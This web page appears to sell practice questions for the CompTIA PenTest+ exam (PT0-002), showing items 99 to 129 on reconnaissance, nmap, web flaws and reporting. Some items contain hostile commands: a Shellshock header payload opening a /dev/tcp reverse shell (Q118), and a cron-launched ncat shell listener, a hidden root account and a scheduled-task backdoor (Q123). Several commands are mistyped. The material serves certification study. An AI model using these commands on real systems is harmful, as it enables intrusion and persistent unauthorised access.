Options:

A.

OWASP

B.

MITRE ATT&CK

C.

PTES

D.

NIST

Buy Now
Questions 99

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

Options:

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Buy Now
Questions 100

A penetration tester is reviewing the logs of a proxy server and discovers the following URLs:

https://test.comptia.com/profile.php?userid=1546

https://test.cpmptia.com/profile.php?userid=5482

https://test.comptia.com/profile.php?userid=3618

Which of the following types of vulnerabilities should be remediated?

Options:

A.

Insecure direct object reference

B.

Improper error handling

C.

Race condition

D.

Weak or default configurations

Buy Now
Questions 101

A penetration tester runs the following command:

nmap -p- -A 10.0.1.10

Given the execution of this command, which of the following quantities of ports will Nmap scan?

Options:

A.

1,000

B.

1,024

C.

10,000

D.

65,535

Buy Now
Questions 102

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

Options:

A.

To maintain confidentiality of data/information

B.

To avoid disclosure of how the hashes were obtained

C.

To make the hashes appear shorter and easier to crack

D.

To prevent analysis based on the type of hash

Buy Now
Questions 103

A penetration tester wants to perform a SQL injection test. Which of the following characters should the tester use to start the SQL injection attempt?

Options:

A.

Colon

B.

Double quote mark

C.

Single quote mark

D.

Semicolon

Buy Now
Questions 104

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

Options:

A.

Remote file inclusion

B.

Cross-site scripting

C.

SQL injection

D.

Insecure direct object references

Buy Now
Questions 105

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Buy Now
Questions 106

During an assessment, a penetration tester obtains a list of password digests using Responder. Which of the following tools would the penetration tester most likely use next?

Options:

A.

Hashcat

B.

Hydra

C.

CeWL

D.

Medusa

Buy Now
Questions 107

A penetration tester is looking for a particular type of service and obtains the output below:

I Target is synchronized with 127.127.38.0 (reference clock)

I Alternative Target Interfaces:

I 10.17.4.20

I Private Servers (0)

I Public Servers (0)

I Private Peers (0)

I Public Peers (0)

I Private Clients (2)

I 10.20.8.69 169.254.138.63

I Public Clients (597)

I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152

I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118

I 68.56.205.98

I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2

I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682

I Other Associations (1)

|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7

Which of the following commands was executed by the tester?

Options:

A.

nmap-sU-pU:517-Pn-n—script=supermicro-ipmi-config

B.

nmap-sU-pU:123-Pn-n—script=ntp-monlist

C.

nmap-sU-pU:161-Pn-n—script«voldemort-info

D.

nmap-sU-pU:37 -Pn -n —script=icap-info

Buy Now
Questions 108

An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?

Options:

A.

Device log facility does not record actions.

B.

End users have root access by default.

C.

Unsigned applications can be installed.

D.

Push notification services require internet.

Buy Now
Questions 109

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?

Options:

A.

Vishing

B.

Watering hole

C.

Whaling

D.

Spear phishing

Buy Now
Questions 110

As part of active reconnaissance, penetration testers need to determine whether a protection mechanism is in place to safeguard the target’s website against web application attacks. Which of the following methods would be the most suitable?

Options:

A.

Direct-to-origin testing

B.

Antivirus scanning

C.

Scapy packet crafting

D.

WAF detection

Buy Now
Questions 111

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

Options:

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open.

Buy Now
Questions 112

A penetration tester is performing DNS reconnaissance and has obtained the following output using different dig comrr

;; ANSWER SECTION

company.com.5INMX10 mxa.company.com

company.com.5IN-MX10 mxb.company.com

company.com.5INMX100 mxc.company.com

;; ANSWER SECTION company.com.5INA120.73.220.53

;; ANSWER SECTION company.com.5INNSnsl.nsvr.com

Which of the following can be concluded from the output the penetration tester obtained?

Options:

A.

mxc.company.com is the preferred mail server.

B.

The company.com record can be cached for five minutes.

C.

The company's website is hosted at 120.73.220.53.

D.

The nameservers are not redundant.

Buy Now
Questions 113

A penetration tester is performing an assessment of an application that allows users to upload documents to a cloud-based file server for easy access anywhere in the world. Which of the following would most likely allow a tester to access unintentionally exposed documents?

Options:

A.

Directory traversal attack

B.

Cross-site request forgery

C.

Cross-site scripting attack

D.

Session attack

Buy Now
Questions 114

A penetration tester exploits a vulnerable service to gain a shell on a target server. The tester receives the following:

Directory of C:\Users\Guest 05/13/2022 09:23 PM mimikatz.exe 05/18/2022 09:24 PM mimidrv.sys 05/18/2022 09:24 PM mimilib.dll

Which of the following best describes these findings?

Options:

A.

Indicators of prior compromise

B.

Password encryption tools

C.

False positives

D.

De-escalation attempts

Buy Now
Questions 115

Which of the following is the most common vulnerability associated with loT devices that are directly connected to the internet?

Options:

A.

Unsupported operating systems

B.

Susceptibility to DDoS attacks

C.

Inability to network

D.

The existence of default passwords

Buy Now
Questions 116

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

Options:

A.

nmap –f –sV –p80 192.168.1.20

B.

nmap –sS –sL –p80 192.168.1.20

C.

nmap –A –T4 –p80 192.168.1.20

D.

nmap –O –v –p80 192.168.1.20

Buy Now
Questions 117

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company’s request?

Options:

A.

The reverse-engineering team may have a history of selling exploits to third parties.

B.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

C.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

D.

The reverse-engineering team will be given access to source code for analysis.

Buy Now
Questions 118

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Options:

A.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

B.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

C.

exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

D.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Buy Now
Questions 119

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

Options:

A.

Wardriving

B.

Shodan

C.

Recon-ng

D.

Aircrack-ng

Buy Now
Questions 120

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

    Have a full TCP connection

    Send a “hello” payload

    Walt for a response

    Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Options:

A.

Run nmap –Pn –sV –script vuln .

B.

Employ an OpenVAS simple scan against the TCP port of the host.

C.

Create a script in the Lua language and use it with NSE.

D.

Perform a credentialed scan with Nessus.

Buy Now
Questions 121

A consultant is reviewing the following output after reports of intermittent connectivity issues:

? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]

? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]

? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]

? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]

? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]

? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]

? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]

? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]

Which of the following is MOST likely to be reported by the consultant?

Options:

A.

A device on the network has an IP address in the wrong subnet.

B.

A multicast session was initiated using the wrong multicast group.

C.

An ARP flooding attack is using the broadcast address to perform DDoS.

D.

A device on the network has poisoned the ARP cache.

Buy Now
Questions 122

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

Options:

A.

Data flooding

B.

Session riding

C.

Cybersquatting

D.

Side channel

Buy Now
Questions 123

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

Options:

A.

schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

B.

wmic startup get caption,command

C.

crontab –l; echo “@reboot sleep 200 && ncat –lvp 4242 –e /bin/bash”) | crontab 2>/dev/null

D.

sudo useradd –ou 0 –g 0 user

Buy Now
Questions 124

The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a “probable port scan” alert in the organization’s IDS?

Options:

A.

Line 01

B.

Line 02

C.

Line 07

D.

Line 08

Buy Now
Questions 125

A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

Options:

A.

Attempting to tailgate an employee going into the client's workplace

B.

Dropping a malicious USB key with the company’s logo in the parking lot

C.

Using a brute-force attack against the external perimeter to gain a foothold

D.

Performing spear phishing against employees by posing as senior management

Buy Now
Questions 126

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe type-casting operations

Buy Now
Questions 127

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Options:

A.

Buffer overflows

B.

Cross-site scripting

C.

Race-condition attacks

D.

Zero-day attacks

E.

Injection flaws

F.

Ransomware attacks

Buy Now
Questions 128

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

Options:

A.

The CVSS score of the finding

B.

The network location of the vulnerable device

C.

The vulnerability identifier

D.

The client acceptance form

E.

The name of the person who found the flaw

F.

The tool used to find the issue

Buy Now
Questions 129

Which of the following is the MOST effective person to validate results from a penetration test?

Options:

A.

Third party

B.

Team leader

C.

Chief Information Officer

D.

Client

Buy Now
Exam Code: PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Last Update: Oct 13, 2024
Questions: 433
PT0-002 pdf

PT0-002 PDF

$28  $80
PT0-002 Engine

PT0-002 Testing Engine

$33.25  $95
PT0-002 PDF + Engine

PT0-002 PDF + Testing Engine

$45.5  $130